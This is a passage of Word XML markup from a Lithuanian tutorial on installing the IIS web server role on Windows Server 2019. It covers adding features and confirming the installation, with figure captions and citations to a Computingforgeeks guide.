        <w:t>Web Server IIS)</w:t>
      </w:r>
      <w:r w:rsidR="00680AA3" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D585CBB" w14:textId="6610D2A1" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59D897AD" w14:textId="48909BE1" w:rsidR="2BFF4895" w:rsidRPr="005A5C28" w:rsidRDefault="03AFE165" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DD5D749" wp14:editId="335E5A6B">
            <wp:extent cx="4572000" cy="3276600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1154594120" name="Paveikslėlis 11545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54594120"/>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11CC1396" w14:textId="36CFA3BE" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A411511" w14:textId="0790A9BA" w:rsidR="4E87DF65" w:rsidRPr="005A5C28" w:rsidRDefault="4E87DF65" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="190ADA06" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> pav. Rolės pridėjimas ir vedlio nuostatos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8F6FAD" w14:textId="66E4F7EA" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="00977221" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Šaltinis: Kibet. J. (2019, spalio 19). Install and Configure IIS Web Server on Windows Server 2019. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Computingforgeeks</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>. Prieiga per internetą: https://computingforgeeks.com/install-and-configure-iis-web-server-on-windows-server/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58396535" w14:textId="2C22D384" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64DE29A8" w14:textId="00BE838E" w:rsidR="4AB5B4A0" w:rsidRPr="005A5C28" w:rsidRDefault="4AB5B4A0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">6 žingsnis: </w:t>
      </w:r>
      <w:r w:rsidR="00510527" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ridėkite IIS funkcijas</w:t>
      </w:r>
      <w:r w:rsidR="00680AA3" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09622CC7" w14:textId="4959B4DA" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="00680AA3" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t>Pasirodžiusiame</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="4AB5B4A0" w:rsidRPr="005A5C28">
        <w:t xml:space="preserve">lange tiesiog spustelėkite </w:t>
      </w:r>
      <w:r w:rsidR="4AB5B4A0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>„Pridėti funkcijas“</w:t>
      </w:r>
      <w:r w:rsidR="001C0B2B" w:rsidRPr="005A5C28">
        <w:t>. P</w:t>
      </w:r>
      <w:r w:rsidR="4AB5B4A0" w:rsidRPr="005A5C28">
        <w:t xml:space="preserve">aspauskite </w:t>
      </w:r>
      <w:r w:rsidR="4AB5B4A0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>„</w:t>
      </w:r>
      <w:r w:rsidR="006E6ADB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Kitas</w:t>
      </w:r>
      <w:r w:rsidR="4AB5B4A0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="4AB5B4A0" w:rsidRPr="005A5C28">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="001C0B2B" w:rsidRPr="005A5C28">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="4AB5B4A0" w:rsidRPr="005A5C28">
        <w:t xml:space="preserve">pustelėkite </w:t>
      </w:r>
      <w:r w:rsidR="4AB5B4A0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>„</w:t>
      </w:r>
      <w:r w:rsidR="5DB604D1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Sekantys</w:t>
      </w:r>
      <w:r w:rsidR="4AB5B4A0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="4AB5B4A0" w:rsidRPr="005A5C28">
        <w:t xml:space="preserve"> kituose trijuose iš eilės languose, kaip parodyta žemiau.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36358868" w14:textId="2443112D" w:rsidR="129D5C6F" w:rsidRPr="005A5C28" w:rsidRDefault="3737BBEA" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C62903B" wp14:editId="23A19175">
            <wp:extent cx="4572000" cy="4495800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="537010497" name="Paveikslėlis 53701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7010497"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId228">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5BDA3C88" w14:textId="4328CA99" w:rsidR="28797C4C" w:rsidRPr="005A5C28" w:rsidRDefault="28797C4C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="5FCB5752" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> pav. Rolės pridėjimas ir vedlio nuostatos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC55613" w14:textId="11213E59" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="00977221" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Šaltinis: Kibet. J. (2019, spalio 19). Install and Configure IIS Web Server on Windows Server 2019. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Computingforgeeks</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>. Prieiga per internetą: https://computingforgeeks.com/install-and-configure-iis-web-server-on-windows-server/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F17DA5D" w14:textId="09A22CC4" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A7F7C1D" w14:textId="795B66E0" w:rsidR="129D5C6F" w:rsidRPr="005A5C28" w:rsidRDefault="0F3547E3" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AD04A3A" wp14:editId="318CF0AC">
            <wp:extent cx="4572000" cy="3276600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="366610417" name="Paveikslėlis 36661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6610417"/>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F48F1E1" w14:textId="6832D3F0" w:rsidR="15D07247" w:rsidRPr="005A5C28" w:rsidRDefault="00BF7B83" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r w:rsidR="15D07247" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="3FD12DD6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>pav. Rolės pridėjimas ir vedlio nuostatos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778675ED" w14:textId="64E628A4" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="00977221" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Šaltinis: Kibet. J. (2019, spalio 19). Install and Configure IIS Web Server on Windows Server 2019. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Computingforgeeks</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>. Prieiga per internetą: https://computingforgeeks.com/install-and-configure-iis-web-server-on-windows-server/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB206F3" w14:textId="77777777" w:rsidR="00977221" w:rsidRPr="005A5C28" w:rsidRDefault="00977221" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C65E4EE" w14:textId="15AE18B9" w:rsidR="129D5C6F" w:rsidRPr="005A5C28" w:rsidRDefault="0F3547E3" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5435D32C" wp14:editId="6C5F3B47">
            <wp:extent cx="4572000" cy="3276600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1460769381" name="Paveikslėlis 146076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6076938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6E1AC9EE" w14:textId="0318D5AF" w:rsidR="3222DDE8" w:rsidRPr="005A5C28" w:rsidRDefault="3222DDE8" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00BF7B83" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="6E299D47" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>pav. Rolės pridėjimas ir vedlio nuostatos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A22516" w14:textId="39584F29" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="00977221" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Šaltinis: Kibet. J. (2019, spalio 19). Install and Configure IIS Web Server on Windows Server 2019. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Computingforgeeks</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>. Prieiga per internetą: https://computingforgeeks.com/install-and-configure-iis-web-server-on-windows-server/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE1BB2E" w14:textId="77777777" w:rsidR="00977221" w:rsidRPr="005A5C28" w:rsidRDefault="00977221" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20FDF514" w14:textId="2F547429" w:rsidR="129D5C6F" w:rsidRPr="005A5C28" w:rsidRDefault="0F3547E3" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7ED27954" wp14:editId="0D698177">
            <wp:extent cx="4572000" cy="3276600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="663004937" name="Paveikslėlis 66300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63004937"/>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3ABDAF38" w14:textId="70576C6A" w:rsidR="0C894A14" w:rsidRPr="005A5C28" w:rsidRDefault="0C894A14" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00BF7B83" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="5900DB62" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>pav. Rolės pridėjimas ir vedlio nuostatos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B93243" w14:textId="1A075AD0" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="00977221" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Šaltinis: Kibet. J. (2019, spalio 19). Install and Configure IIS Web Server on Windows Server 2019. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Computingforgeeks</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>. Prieiga per internetą: https://computingforgeeks.com/install-and-configure-iis-web-server-on-windows-server/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2733A0ED" w14:textId="77777777" w:rsidR="00977221" w:rsidRPr="005A5C28" w:rsidRDefault="00977221" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05799DEA" w14:textId="555FFDCD" w:rsidR="4AB5B4A0" w:rsidRPr="005A5C28" w:rsidRDefault="4AB5B4A0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">7 veiksmas: </w:t>
      </w:r>
      <w:r w:rsidR="00510527" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>atvirtinkite pasirinkimus</w:t>
      </w:r>
      <w:r w:rsidR="00680AA3" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5A2AC0" w14:textId="0791127B" w:rsidR="4AB5B4A0" w:rsidRPr="005A5C28" w:rsidRDefault="4AB5B4A0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t>Puslapyje „Patvirtinti diegimo</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> pasirinkimus“ spustelėkite „</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Įdiegti</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="001C0B2B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="001C0B2B" w:rsidRPr="005A5C28">
        <w:t xml:space="preserve"> P</w:t>
      </w:r>
      <w:r w:rsidR="00510527" w:rsidRPr="005A5C28">
        <w:t>alaukite</w:t>
      </w:r>
      <w:r w:rsidR="00680AA3" w:rsidRPr="005A5C28">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00680AA3" w:rsidRPr="005A5C28">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:t>pustelėkite „</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Uždaryti</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43027429" w14:textId="0A50F504" w:rsidR="5E5B3320" w:rsidRPr="005A5C28" w:rsidRDefault="621F0956" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="593BAA9F" wp14:editId="5A7F4029">
            <wp:extent cx="4572000" cy="3257550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="448160441" name="Paveikslėlis 4481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816044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1D1BE8E5" w14:textId="0F5317BC" w:rsidR="5A57BBBA" w:rsidRPr="005A5C28" w:rsidRDefault="5A57BBBA" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00BF7B83" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> pav. Rolės pridėjimas ir vedlio nuostatos. Konfigūravimas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791210E9" w14:textId="77777777" w:rsidR="00977221" w:rsidRPr="005A5C28" w:rsidRDefault="00977221" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Šaltinis: Kibet. J. (2019, spalio 19). Install and Configure IIS Web Server on Windows Server 2019. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Computingforgeeks. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Prieiga per internetą: https://computingforgeeks.com/install-and-configure-iis-web-server-on-windows-server/</w:t>
